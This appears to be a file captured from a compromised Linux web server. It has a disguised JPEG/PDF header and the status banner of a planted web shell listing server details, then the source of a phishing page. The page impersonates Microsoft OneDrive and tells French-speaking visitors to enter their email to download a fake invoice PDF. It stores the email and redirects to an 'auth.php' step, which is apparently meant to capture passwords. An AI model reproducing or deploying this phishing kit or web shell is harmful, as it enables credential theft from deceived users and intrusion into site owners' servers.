ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.129 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/www/jxs/renew/ |
Upload File : |
<?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email = $_POST['email']; $_SESSION['email'] = $email; // Redirect to the next page header("Location: auth.php"); exit(); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests" /> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" /> <link rel="stylesheet" href="assets/css/styles.css" /> <script async src="assets/js/main.js"></script> <title>One Drive</title> </head> <body> <!-- <header></header> --> <div class="main-head"> <img src="ms.png" alt="microsoft-logo" width="30" /> <p>Microsoft</p> </div> <main> <div class="main-body"> <h3>View Document</h3> <p>VOUS AVEZ REÇU UN DOCUMENT PROTÉGÉ:</p> <div class="pdf"> <img src="assets/images/pdf.png" alt="pdf-logo" width="20" /> <p>FACTURE/INVOICE.pdf</p> </div> <p>ENTREZ VOTRE ADRESSE E-MAIL POUR TÉLÉCHARGER.</p> <form id="form" action="" method="post"> <input type="email" id="email" name="email" placeholder="Enter your email" /> <span class="material-symbols-outlined"> info </span> <div id="error"> </div> <button id="next1" type="submit">Next</button> </form> <small class="terms">By clicking "Next," you consent to allowing ONE DRIVE to use your email address in accordance with their privacy policy.</small> </div> </main> <a href="#">Privacy policy</a> </body> </html>